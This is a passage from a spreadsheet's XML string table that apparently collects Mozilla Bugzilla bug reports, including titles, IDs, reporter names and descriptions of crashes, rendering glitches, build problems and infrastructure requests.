Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
Clicking a link that loads in _top then using the back button to return to the frameset results in the browser window losing focus.
Also happens when using the top.location.replace() Javascript function.
Reproducible: Always
Steps to Reproduce:
1. Go to http://staff.washington.edu/brodbd/focusdemo/.
2. Click the link in one of the frames.
3. Press the back button.
Actual Results:  
The arrow keys now cause an error beep and hovering the mouse over a link no longer causes the cursor to change the window has lost focus.  Clicking anywhere in the window restores the focus and the browser acts normally again.
Expected Results:  
The browser window should always retain focus when using the back button.</t>
  </si>
  <si>
    <t>gull</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-525346</t>
  </si>
  <si>
    <t>post replacement set up of talos-rev2-linux17</t>
  </si>
  <si>
    <t>CORE-169477</t>
  </si>
  <si>
    <t>favicon color palette reversed or too red</t>
  </si>
  <si>
    <t>favicons on most sites are getting their colors reversed by netscape and
showing up incorrectly on this morning's builds.
I've so far seen this behaviour on the following sites:
http://home.netscape.com
http://my.netscape.com
http://www.yahoo.com
http://www.cnn.com
http://antitux.net</t>
  </si>
  <si>
    <t>CORE-529670</t>
  </si>
  <si>
    <t>Crash [@ nsINode::GetCurrentDoc] after range.detach and then using getClientRects</t>
  </si>
  <si>
    <t>Created attachment 413200
testcase
See testcase which crashes current trunk build on load. I guess this is a regression from bug 396392.
http://crash-stats.mozilla.com/report/index/941771d1-1ccf-4760-a1dc-251ab2091118
0	xul.dll	nsINode::GetCurrentDoc
1	xul.dll	GetPresShell
2	xul.dll	nsRange::GetClientRects
3	xul.dll	NS_InvokeByIndex_P
4	xul.dll	XPCWrappedNative::CallMethod
5	xul.dll	XPC_WN_CallMethod
6	mozjs.dll	js_Invoke
7	mozjs.dll	js_Interpret
8	mozjs.dll	js_Execute
9	mozjs.dll	JS_EvaluateUCScriptForPrincipals
10	xul.dll	nsJSContext::EvaluateString
11	xul.dll	nsScriptLoader::EvaluateScript
12	xul.dll	nsScriptLoader::ProcessRequest
13	xul.dll	nsScriptLoader::ProcessScriptElement</t>
  </si>
  <si>
    <t>CORE-245572</t>
  </si>
  <si>
    <t>Crash displaying www.thewebtier.com/template.jsp?selected=4  [@ nsCSSValue::Reset ]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a2) Gecko/20040603
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a2) Gecko/20040603
Linked to URL from google search results.
Page displayed then Mozilla crashed.
Talkback IDs: TB74569Q TB74559W using Mozilla nightly 2004060208
Talkback ID: TB74619Y using Mozilla nightly 2004060308
Reproducible: Always
Steps to Reproduce:
1.load http://www.thewebtier.com/template.jsp?selected=4
2.wait a few seconds
3.crash
Actual Results:  
crash
Expected Results:  
not crash</t>
  </si>
  <si>
    <t>rontilby</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-872275</t>
  </si>
  <si>
    <t>Commit access for hg.ecmascript.org for Trevor Baker</t>
  </si>
  <si>
    <t>Created attachment 749536
Trevor Baker's public key
+++ This bug was initially created as a clone of Bug #862585 +++
+++ This bug was initially created as a clone of Bug #701067 +++
+++ This bug was initially created as a clone of Bug #627884 +++
Trevor Baker  needs commit access to hg.ecmascript.org/tests/test262. Note that Trevor does *not* need to sign a committer's agreement (see bug 604656). Public key attached.
Thanks
Dave</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-494824</t>
  </si>
  <si>
    <t>add 3.5pre to crash-stats version table</t>
  </si>
  <si>
    <t>Need 3.5pre added so branch crashes since May 20 show up!</t>
  </si>
  <si>
    <t>CALENDAR-412202</t>
  </si>
  <si>
    <t>Long text strings in reminder should use line breaks and not scroll horizontally</t>
  </si>
  <si>
    <t>Long text strings in reminder should use line breaks and not scroll horizontally. At the moment long event titles are shown in one line and the window has a horizontal scroll bar. This should generally be performed for strings used in the reminder if possible.</t>
  </si>
  <si>
    <t>CORE-379239</t>
  </si>
  <si>
    <t>[cookies] implement countCookiesFromHost() in backend</t>
  </si>
  <si>
    <t>mconnor recently mentioned the following UI code which trawls through the entire local cookie list to determine if a given host has set any cookies:
http://lxr.mozilla.org/mozilla/source/browser/base/content/pageinfo/security.js#297
this is more efficiently done in the backend with a simple hashtable lookup. we already have the code to do this it just needs refactoring a little. patch forthcoming.</t>
  </si>
  <si>
    <t>DEVELOPER_SERVICES-450741</t>
  </si>
  <si>
    <t>need a way to allow a single head per branch on an hg repo</t>
  </si>
  <si>
    <t>Created attachment 333924
allow single head per branch
Since we're going with permanent named branches in our existing repositories this hook needs to be updated.
I've tested this patch locally and it seems to work as intended...note that we only test active branches. Inactive branches seem to list two heads with 'hg heads -r $branch' when we have more than one active branch...</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-478383</t>
  </si>
  <si>
    <t>Broken Localizations link on b.m.o/enter_bug.cgi</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 Ubiquity/0.1.5
Build Identifier: 
The more info link under Mozilla Localizations on the Enter Bug page (which links to http://www.mozilla.org/projects/l10n/) produces a 404.
Reproducible: Always
Steps to Reproduce:
1. Go to http://bugzilla.mozilla.org/enter_bug.cgi
2. Click on more info under Mozilla Localizations
Actual Results:  
Arrive at a 404 error page.
Expected Results:  
It should link to an appropriate page (https://wiki.mozilla.org/L10n:Home_Page?).</t>
  </si>
  <si>
    <t>walter</t>
  </si>
  <si>
    <t>CORE-484305</t>
  </si>
  <si>
    <t>DOM: Workers</t>
  </si>
  <si>
    <t>Workers: loaded scripts may be decoded using wrong text encoding.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10_5_6 en-us) AppleWebKit/525.27.1 (KHTML like Gecko) Version/3.2.1 Safari/525.27.1
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.2a1pre) Gecko/20090310 Minefield/3.2a1pre
Discussion in whatwg mail list clarifies that content of the scripts loaded as a result of 'new Worker(url)' or 'importScripts(url)' should be decoded using UTF-8 or the encoding specified in Content-Type http header if present.
FF decodes the scripts using the encoding of the parent document. This is correct for  tag but not for Workers.
Reproducible: Always</t>
  </si>
  <si>
    <t>nsm.nikhil</t>
  </si>
  <si>
    <t>dimich</t>
  </si>
  <si>
    <t>SEAMONKEY-56058</t>
  </si>
  <si>
    <t>hardcoded save as draft dialog</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/4.75 [en] (WinNT U)
BuildID:    M17 Netscape PR3
the name of the Drafts folder in the save as draft dialog appears to be 
hardcoded. the message Message has not been Sent. Do you want to save the 
message in the Drafts folder assumes the Drafts folder is in fact called Drafts 
when it might not be.
Reproducible: Always
Steps to Reproduce:
1. Create a folder named My Drafts
2. In Edit | Mail/News Account Settings | Copies and Folders select My Drafts 
as the folder to which Drafts are saved. 
3. Compose a message but don't send it.
4. Attempt to close the compose window.
5. Notice the Save as Draft dialog refers to Drafts folder not the My Drafts 
folder.
Expected Results:  Mozilla should have displayed the name of the folder it was 
saving the Draft to.</t>
  </si>
  <si>
    <t>staats</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-178452</t>
  </si>
  <si>
    <t>URL munger breaking mIRC color codes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2b) Gecko/20021029 Phoenix/0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2b) Gecko/20021029 Phoenix/0.4
If you have mIRC colour codes inside something the URL munger things is a link
the colour codes are completely ignored and show up as the raw characters.
Reproducible: Always
Steps to Reproduce:
1. Open ChatZilla. (you don't need to connect to any servers for this test)
2. Make sure the munger options (in File &gt; Options &gt; Munger) for Color Codes
and URLs are both on.
3. Enter /echo  into ChatZilla and past the contents of the file
http://www.warwickcompsoc.co.uk/~silver/test/mozilla/mIRC_color_test.txt after
it. Then press return.
4. Now turn off the URLs munger option and repeat (press up addow then
return to do it easily).
Actual Results:  
The first line has odd links that go nowhere and visible mIRC colour code
characters (they'll probably show up as little squares).
the second line will not have any links and will be coloured differently
(correctly).
Expected Results:  
Both lines should be the same at least colour-wise though the first one may
have links.
As noted about the simplest work-around it to turn of the URL munger but this
is clearly not advisable for normal users.</t>
  </si>
  <si>
    <t>CORE-289191</t>
  </si>
  <si>
    <t>Selecting text with a light color on a light background results in a white background-color for ::selection</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050405 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050405 Firefox/1.0+
When selecting a piece of text with a light color (specified in the CSS)on a
light background. The selection color is white.
Reproducible: Always
Steps to Reproduce:
1.Select a piece of light coloured text on a light background
Actual Results:  
You see a darkblue on white selection
Expected Results:  
You should see a white on darkblue selection</t>
  </si>
  <si>
    <t>uruviel</t>
  </si>
  <si>
    <t>CORE-327874</t>
  </si>
  <si>
    <t>Fixes to cairo-gtk2 builds</t>
  </si>
  <si>
    <t>I have a bunch of fixes to cairo-gtk2 trunk that should be landed ASAP without them the build is currently unusable.</t>
  </si>
  <si>
    <t>CORE-449282</t>
  </si>
  <si>
    <t>video elements cannot seek by setting currentTime = x</t>
  </si>
  <si>
    <t>Created attachment 332417
Seeking test
See attached testcase - running in today's nightly I get:
Error: uncaught exception: [Exception... Component returned failure code: 0x80004001 (NS_ERROR_NOT_IMPLEMENTED) [nsIDOMHTMLVideoElement.currentTime]  nsresult: 0x80004001 (NS_ERROR_NOT_IMPLEMENTED)  location: JS frame :: file:///Users/schrep/Desktop/video3.html :: onclick :: line 1  data: no]</t>
  </si>
  <si>
    <t>CORE-229620</t>
  </si>
  <si>
    <t>s/CalcDominateBorder/CalcDominantBorder/g ?</t>
  </si>
  <si>
    <t>this looks like pure activism to me however brendan made the comment so lets do it.
from bug 4510
------- Additional Comment #145 From Brendan Eich  2003-12-28 22:44 -------
s/CalcDominateBorder/CalcDominantBorder/g ?
/be
------ Additional Comment #146 From Boris Zbarsky (not in town no tree) 
2003-12-28 22:50 -------
As a separate patch sure.  This one is already pretty big....</t>
  </si>
  <si>
    <t>MOZILLA.ORG-305382</t>
  </si>
  <si>
    <t>No tinderbox/latest-mozilla1.8-l10n/ for Firefox and Thunderbird</t>
  </si>
  <si>
    <t>Firefox and Thunderbird tinderbox builds for Mozilla1.8-l10n are not copied to
tinderbox/latest-mozilla1.8-l10n/ presumably because the directories don't exist.
See logs:
http://tinderbox.mozilla.org/showlog.cgi?log=Mozilla1.8-l10n/1124595350.21010.gz
http://tinderbox.mozilla.org/showlog.cgi?log=Mozilla1.8-l10n/1124594007.8675.gz</t>
  </si>
  <si>
    <t>CORE-483607</t>
  </si>
  <si>
    <t>sorting storage template integers does not work properly</t>
  </si>
  <si>
    <t>Created attachment 367598
fix up
This is a regression from bug 476634 because the sort code should be checking for 64 bit integers. Laurent can you check if this looks ok to you? It fixes an issue with a couple of the storage tests in bug 378893.</t>
  </si>
  <si>
    <t>BUGZILLA-285407</t>
  </si>
  <si>
    <t>User cannot log in on PostgreSQL</t>
  </si>
  <si>
    <t>This one's pretty easy:
DBD::Pg::st execute failed: ERROR:  pg_atoi: error in  .  [for Statement
SELECT grantor_id
                                             FROM group_group_map
                                            WHERE member_id=?
                                              AND grant_type=' . 
                                                  GROUP_MEMBERSHIP . '] at
Bugzilla/User.pm line 480
	Bugzilla::User::derive_groups('Bugzilla::User=HASH(0x8921fec)''undef') called
at Bugzilla/User.pm line 138
	Bugzilla::User::_create('Bugzilla::User''userid=?'1) called at
Bugzilla/User.pm line 57
	Bugzilla::User::new('Bugzilla::User'1) called at Bugzilla/Auth/Login/WWW.pm
line 71
	Bugzilla::Auth::Login::WWW::login('Bugzilla::Auth::Login::WWW'2) called at
Bugzilla.pm line 64
	Bugzilla::login('Bugzilla'2) called at /var/www/html/dbinstall/query.cgi line 63
Look at the quoting.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-181446</t>
  </si>
  <si>
    <t>Thread will be broken when child message is followed by parent message if subjects are not the same</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 ja-JP rv:1.0.1) Gecko/20020823 Netscape/7.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3a) Gecko/20021115
Thread will be broken when child message is followed by parent message.
Reproducible: Always
Steps to Reproduce:
I will upload an attachment (mbox) which contains 2 groups of messages
a:(test1 test2 test3) and b:(test1r test2r test3r)
View messages in thread mode.
Actual Results:  
group a has correct thread view but group b dose not.
=test1
|-=test2
  |-=test3
=test3r
=test2r
=test1r
Expected Results:  
=test1
|-=test2
  |-=test3
=test1r
|-=test2r
  |-=test3r
The only difference between group a and b is:
in group a parent message is followed by child message
in group b child message is followed by parent message.
This often occurs when we copy/move messages individually.</t>
  </si>
  <si>
    <t>u69748</t>
  </si>
  <si>
    <t>THUNDERBIRD-291346</t>
  </si>
  <si>
    <t>After migrating from Seamonkey or Outlook / Outlook Express NO Passwords will be saved</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Build Identifier: Thunderbird 1.0.2
After migrating from Seamonkey or Outlook / Outlook Express NO Passwords will be
saved.
This problem occurs in the following cases:
1) In Outlook / Outlook Express was defined to NOT remember passwords
2) In Mozilla Suite was defined to NOT remember passwords (which was often
intended to not save passwords in the browser - not mail)
Thunderbird users are not beware of this pref after migration. It is a real
problem because of no existing UI to see or change this pref in Thunderbird!
user_pref(signon.rememberSignons false)
Reproducible: Always
Expected Results:  
We should have a pref UI to this pref (which is exising in Firefox).</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-526379</t>
  </si>
  <si>
    <t>[AMO] Need configuration change on preview.amo</t>
  </si>
  <si>
    <t>On preview.amo:
1) /site/app/config/config.php defines a REDIRECT_URL which is currently https.  It needs to be http.
2) Once that change is complete please run:
cd bin
php -f run_once/seed_purified_translations.php
That will take about 10 minutes and will have a half dozen php notices.  They aren't a big deal.
Thanks.</t>
  </si>
  <si>
    <t>SEAMONKEY-122149</t>
  </si>
  <si>
    <t>standalone checkout complains about newborn files disappearing</t>
  </si>
  <si>
    <t>The first problem is that BUILD_MODULES=xpconnect pull_all doesn't get
configure Makefile.in or allmakefiles.sh (which the build very much wants).
But even if I get those by hand it dies trying to go into LDAP in the export phase:
gmake -C directory/c-sdk/ldap export
gmake[3]: Entering directory `/src/mozilla/xpcom/mozilla/directory/c-sdk/ldap'
gmake[3]: *** No rule to make target `export'.  Stop.
It is to cry.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-381997</t>
  </si>
  <si>
    <t>Gerv's b.m.o. SQL execution requests</t>
  </si>
  <si>
    <t>This bug is to track some SQL execution requests for bugzilla.mozilla.org - initially to help with triaging old reviews. Rather than opening a new bug for each one I'll paste them in here and assign the bug whoever does it can attach the results and assign the bug back to me.
Gerv</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-199656</t>
  </si>
  <si>
    <t>reuters.com - Hidden drop down menu displays in the wrong place relative to IE</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20030312 Phoenix/0.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20030312 Phoenix/0.5
There is a drop down menu when you move your mouse over ABOUT REUTERS on the
upper right hand side of the screen when you view in IE.  With Mozilla/Pheonix
is always displays the drop down (as opposed to only when the mouse is there)
and it shows up in the wrong place.  I don't know if this the Gecko's fault or
more likely Reuters writing bad DHTML.
Reproducible: Always
Steps to Reproduce:
1. Go to http://about.reuters.com/
2.
3.
Actual Results:  
Drop down always shows
Expected Results:  
Not shown the menu until the mouse was over the link.</t>
  </si>
  <si>
    <t>pwolpe</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-454692</t>
  </si>
  <si>
    <t>take new talos ref image for winxp.</t>
  </si>
  <si>
    <t>Changes have been made on qm-ref-xp to meet requirements of bug 419936.  Need to take a new image of qm-ref-xp and have it become the default talos winxp ref image for use on all new talos winxp machines.</t>
  </si>
  <si>
    <t>CORE-302940</t>
  </si>
  <si>
    <t>First element in tree is selected when expanding a folder</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050731 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050731 Firefox/1.0+
When you open the bookmarks sidebar initially there is no element with focus.
If you click on any + beside a folder (except the first one) on the sidebar
the very first element will get focus. 
This can be very annoying if you have a large list of bookamrks folders. If you
scroll your list on sidebar (using the mouse scrollrad) to point to a folder on
the bottom and click on + the list will jump to the very first element on the
list.
A similar problem occours also with the History sidebar.
The issue started with build 20050726. 
Reproducible: Always
Steps to Reproduce:
1.Create a new profile. 
2.Open the bookmarks sidebar.
3.Click on the + signal beside the third folder on it (Firefox and Mozilla
Links).
Actual Results:  
Notice that the first folder (Bookmarks Toolbar Folder) get focus. 
Expected Results:  
The old behaviour was if you click on the + beside a folder the focus stills
on the last selected element. If no element was selected (as you open the
sidebar at the first time) it should still with no element selected.</t>
  </si>
  <si>
    <t>pardal</t>
  </si>
  <si>
    <t>CORE-401989</t>
  </si>
  <si>
    <t>inconsistency with font name matching across platforms and compared to safari/opera</t>
  </si>
  <si>
    <t>Created attachment 286926
screenshot of Tahoma Bold in trunk IE6 Safari 3 Opera 9.2
We don't match font names specified in the font-family CSS attribute in a way that's consistent with WebKit/Opera.
Given:
   font-family: Tahoma Bold Georgia
trunk IE6: font face used is Tahoma no bold
WebKit: font face used is Tahoma Bold bold
Opera: font face used is Georgia</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-376654</t>
  </si>
  <si>
    <t>allow blocking1.9 flag to be used for *all* core bugs</t>
  </si>
  <si>
    <t>per bz I've removed the following exclusions:
      Core:MailNews: Address Book
      Core:MailNews: Attachments
      Core:MailNews: Backend
      Core:MailNews: BiDi Hebrew  Arabic
      Core:MailNews: Composition
      Core:MailNews: Database
      Core:MailNews: Filters
      Core:MailNews: Import
      Core:MailNews: Internationalization
      Core:MailNews: LDAP Integration
      Core:MailNews: Localization
      Core:MailNews: MIME
      Core:MailNews: Movemail
      Core:MailNews: Networking
      Core:MailNews: Palm Sync
      Core:MailNews: Printing
      Core:MailNews: Profile Migration
      Core:MailNews: Search
      Core:MailNews: Security
      Core:MailNews: Simple MAPI
      Core:Networking: IMAP
      Core:Networking: News
      Core:Networking: POP
      Core:Networking: SMTP
from the blocking1.9 flag</t>
  </si>
  <si>
    <t>TOOLKIT-460934</t>
  </si>
  <si>
    <t>tooltip-label class should be globally available</t>
  </si>
  <si>
    <t>Created attachment 344039
patch
tooltip-label is currently used twice in browser.xul (btTitleText btUrlText) without avail. And there's one place where we removed it because it didn't work (urlTooltip). These are all valid cases for both using custom labels in tooltips and adding the tooltip-label class to them. To support these cases the tooltip-label styling should move from popup.css to global.css.</t>
  </si>
  <si>
    <t>FIREFOX-461304</t>
  </si>
  <si>
    <t>Loading URL by pressing ENTER on already present URL in location bar doesn't maintain URL encoding</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b2pre) Gecko/20081022 Minefield/3.1b2pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b2pre) Gecko/20081022 Minefield/3.1b2pre
When you load a page in Firefox the location bar makes some magic and decodes the URL making %c3%b6 for instance appearing as Ã¶. All this is fine but when I just go to the location bar and press ENTER the encoding gets screwed up.
What I think Firefox does wrong: 
It doesn't remember what encoding the page loaded had (UTF-8) and therefore just encodes it as ISO-8859-1 or something like this. It should remember the encoding.
Reproducible: Always
Steps to Reproduce:
1.Load the URL in the URL field see that the textbox to the right contains hÃ¶jning
2.Go to the location bar and press ENTER
3.See how the text box changes to hï¿½jning
Actual Results:  
The URL encoding changed
Expected Results:  
The URL encoding stays the same</t>
  </si>
  <si>
    <t>deleeuw+bugzilla</t>
  </si>
  <si>
    <t>CORE-337334</t>
  </si>
  <si>
    <t>Can't hide browser after or during Download Manager activity</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1a2) Gecko/20060509 BonEcho/2.0a2
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1a2) Gecko/20060509 BonEcho/2.0a2
After opening then closing Downloads window Bon Echo can't be hidden anymore.
Reproducible: Always
Steps to Reproduce:
1. Launch Bon Echo
2. Goto into Bon Echo menu then select Hide Bon Echo =&gt; Bon Echo is hidden
3. Display Bon Echo open Downloads window then close this window
4. Goto into Bon Echo menu then select Hide Bon Echo =&gt; Bon Echo is not hidden. I seems to go to background a right click on Dock's icon displays the Display menu item but the main window remains visible.
Actual Results:  
Bon Echo main window is not hidden.
Expected Results:  
Bon Echo main window must be hidden.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-308094</t>
  </si>
  <si>
    <t>Increase the default size of the download window so that all buttons are visible</t>
  </si>
  <si>
    <t>Currently the default size of the download window doesn't show all the buttons
in the download window toolbar increase the default/minimum size of the
download window to fix this.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-494773</t>
  </si>
  <si>
    <t>people don't like the Firefox proxyResolveFailure.title translation</t>
  </si>
  <si>
    <t xml:space="preserve">Preface: i've received this complaint from someone else and am trying to translate it for use here. I don't speak Portuguese (but I was in Portugal last year!) so I'm really a middle man.
Preconditions:
Firefox = Portuguese (Portugal)
Steps:
1. load about:config
2. click Serei cuidadoso prometo!
3. in the top field enter proxy
4. double click network.proxy.http
5. enter 99.99.99.99 ok
6. double click network.proxy.http_port
7. enter 999 ok
8. double click network.proxy.type
9. enter 1 ok
10. load http://www.bbc.com
ACTUAL OUTCOME:
Incapaz de encontrar o servidor proxy.
EXPECTED OUTCOME:
NÃ£o foi possÃ­vel encontrar o servidor proxy.
For reference here are all the different versions of this string. Bruno (Brazil) thinks that the default message (dom chrome Brazil) is the best of the bunch.
/pt-BR/dom/chrome/netError.dtd (View Hg log or Hg annotations)
    * line 52 -- 
/pt-BR/browser/chrome/overrides/netError.dtd (View Hg log or Hg annotations)
    * line 95 -- 
/pt-PT/mobile/chrome/overrides/netError.dtd (View Hg log or Hg annotations)
    * line 98 -- 
/pt-PT/dom/chrome/netError.dtd (View Hg log or Hg annotations)
    * line 50 -- 
/pt-PT/browser/chrome/overrides/netError.dtd (View Hg log or Hg annotations)
    * line 46 -- </t>
  </si>
  <si>
    <t>CORE-217896</t>
  </si>
  <si>
    <t>ASSERTION: nsMemoryImpl::Alloc of 0: 'size' in GlobalWindowImpl::Unescape</t>
  </si>
  <si>
    <t>Notes:
1. abusedContracts contains:
@mozilla.org/rdf/datasource1?name=msgaccountmanager
@mozilla.org/rdf/datasource1?name=mailnewsfolders
(which shouldn't matter)
2. For some reason Gecko is having a very hard time rendering text using English
characters.
Console output:
###!!! ASSERTION: You are calling CreateInstance
@mozilla.org/locale/win32-locale1 when a service for this CID already exists!
Add it to abusedContracts to track down the service consumer.: 'Error' file
i:/build/mozilla/xpcom/components/nsComponentManager.cpp line 2034
Reflow time (this=0D7B6EA8): Real time 0:0:0.691 CP time 0.681
Frame construction plus style resolution time (this=0D7B6EA8): Real time
0:0:0.551 CP time 0.541
Style resolution time (this=0D7B6EA8): Real time 0:0:3.205 CP time 0.751
WARNING: NS_ENSURE_TRUE(!aName.IsEmpty()) failed file
i:/build/mozilla/content/base/src/nsNodeInfoManager.cpp line 226
###!!! ASSERTION: unable to normalize attribute name: 'NS_SUCCEEDED(rv)' file
i:/build/mozilla/content/xul/content/src/nsXULElement.cpp line 1274
XPC - Begin deferred Release of 661 nsISupports pointers
XPC - End deferred Releases
Parse Time (this=0D6A3960): Real time 0:0:0.50 CP time 0.040
DTD Time: Real time 0:0:0.0 CP time 0.000
Tokenize Time: Real time 0:0:0.30 CP time 0.030
Reflow time (this=0D8513F8): Real time 0:0:0.70 CP time 0.070
Frame construction plus style resolution time (this=0D8513F8): Real time
0:0:0.251 CP time 0.250
Style resolution time (this=0D8513F8): Real time 0:0:0.260 CP time 0.200
###!!! ASSERTION: nsMemoryImpl::Alloc of 0: 'size' file
i:/build/mozilla/xpcom/base/nsMemoryImpl.cpp line 322
Break: at file i:/build/mozilla/xpcom/base/nsMemoryImpl.cpp line 322
nsDebug::Assertion(const char * 0x002f4200 const char * 0x002f41f8 const char
* 0x002f41c8 int 322) line 109
nsMemoryImpl::Alloc(nsMemoryImpl * const 0x00437328 unsigned int 0) line 322 +
31 bytes
nsMemory::Alloc(unsigned int 0) line 88
GlobalWindowImpl::Unescape(GlobalWindowImpl * const 0x0d4872cc const nsAString
&amp; {...} nsAString &amp; {...}) line 3695 + 12 bytes
+	charset	{UTF-8}
	maxLength	0
	unescapedByteCount	0
	rv	0
+	decoder	{0x0d6fc7e8}
+	dest	0x002751a7
+	encodedData	0x0d6fc830 
	destLen	0
XPTC_InvokeByIndex(nsISupports * 0x0d4872cc unsigned int 84 unsigned int 2
nsXPTCVariant * 0x0012e97c) line 102
XPCWrappedNative::CallMethod(XPCCallContext &amp; {...} XPCWrappedNative::CallMode
CALL_METHOD) line 2023 + 42 bytes
0 [native frame]
1 anonymous(aSink = [xpconnect wrapped (nsISupports nsIRDFDataSource
nsIRDFRemoteDataSource nsIRDFXMLSink) @ 0xd9f51d
8]) [chrome://communicator/content/pref/pref-applications.js:111]
    prefService = [xpconnect wrapped nsIPrefService @ 0xd78b158]
    prefBranch = [xpconnect wrapped nsIPrefBranch @ 0xd86dd68]
    neverAskSave =
    neverAskOpen =
    i = 0
    type = undefined
    newEntries = [object Object]
    newEntry = undefined
    this = [object Object]
2 [native frame]
I can reproduce this assert if i use javascript:unescape('') and walk past some
problems where the document tries to use iso-8859-1 instead of ISO-8859-1.
I thought there once was a bug for this but i couldn't find it.</t>
  </si>
  <si>
    <t>BUGZILLA-507493</t>
  </si>
  <si>
    <t>checksetup.pl's output should use colors for missing and too old Perl modules</t>
  </si>
  <si>
    <t>Since we released Bugzilla 3.4 two days ago a lot of people jump on IRC complaining that their upgrade doesn't work. When we ask them to paste the output of checksetup.pl on pastebin we can see that the problem is most of the time because they have a missing or too old required Perl module. I think using colors to highlight missing or too old modules would help a lot. justdave suggested to use Term::Cap for this.
I'm suggesting to use red for missing or too old required modules and orange for optional ones.</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-392593</t>
  </si>
  <si>
    <t>Wrong type for arguments object</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.6) Gecko/20060601 Firefox/2.0.0.6 (Ubuntu-edgy)
Build Identifier: 
The arguments object available within function execution should be a normal object not an own type.
This leads currently to errors for instance for typeof or toString() (see unit test in attached patch)
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
[seems I can't attach a patch here. I try to open the issue first and attach then]</t>
  </si>
  <si>
    <t>FIREFOX-177506</t>
  </si>
  <si>
    <t>turning off hide tab bar ... has no effect until new tab/window is opened.</t>
  </si>
  <si>
    <t>Observed in Phoenix 0.4 on both Windows XP and Linux.
Turning off the hide tab bar when only one tab is open option in the
preferences does not have an effect until an additional tab is opened.
To recreate:
1.  Load Phoenix with the hide tab bar ... option enabled.
2.  Ensure that only ONE TAB is open.
3.  Go into preferences turn off hide tab bar ... option.
4.  Close preferences.
5.  Observe that a tab for the current page did NOT appear.
6.  Go to File -&gt; New Tab
7.  Observe that you now have a tab for the original page and a new tab.
8.  Close the new tab observe that you now have the tab for the original page.</t>
  </si>
  <si>
    <t>bolas</t>
  </si>
  <si>
    <t>CORE-326784</t>
  </si>
  <si>
    <t>add a notification that a newly-opened window has been initialized</t>
  </si>
  <si>
    <t>Currently we have the domwindowopened notification that fires immediately after a new window has been created.  It would be useful to be able to inspect properties of the window such as the opener name and size which have not yet been set.  Since domwindowopened is ingrained into the behavior of a few interface methods (nsPIWindowWatcher nsIBaseWindow nsIAppShellService) I'd like to add a new notification that would be suitable for MOZILLA_1_8_BRANCH.</t>
  </si>
  <si>
    <t>NSS-66237</t>
  </si>
  <si>
    <t>Several bugfixes in the QA wrapper</t>
  </si>
  <si>
    <t>Since we have frozen the tip I only checked in high priority fixes.
The attached pach fixes several problems most of them have not been filed as
bugs 2 of the bugs have already been closed. We have been running most of these
fixes in the qa_wrapper for about a week all have been tested on at least 2
platforms.
I'd need a review.
The individual fixes:
1) A complete QA failure produces a readable email now
2) the nssqa has goes thru a central Exit
3) hanging processes under NT and Win2K are killed (tail -f)
4) Functionallity is implemented to kill other remaining processes (killpif file)
5) improved general cleanup in Exit functions
6) the header is sourced from the nssqa dir rateher than /u/sonmi/bin
7) Problems with QA being reported as passed even if missing fixed
8) Most problems with the missing Platform list fixed
9) One QA failure path (cd to a dir without permission) did not give
errormessage about the reason of failure before
10) fixed html errors in generated email
11) stopped filtering the bad password cases as real failures (was fixed in
nssqa a while ago but still filtered
12) removing more tmp files from /tmp (decreased debugging)</t>
  </si>
  <si>
    <t>NSS-66244</t>
  </si>
  <si>
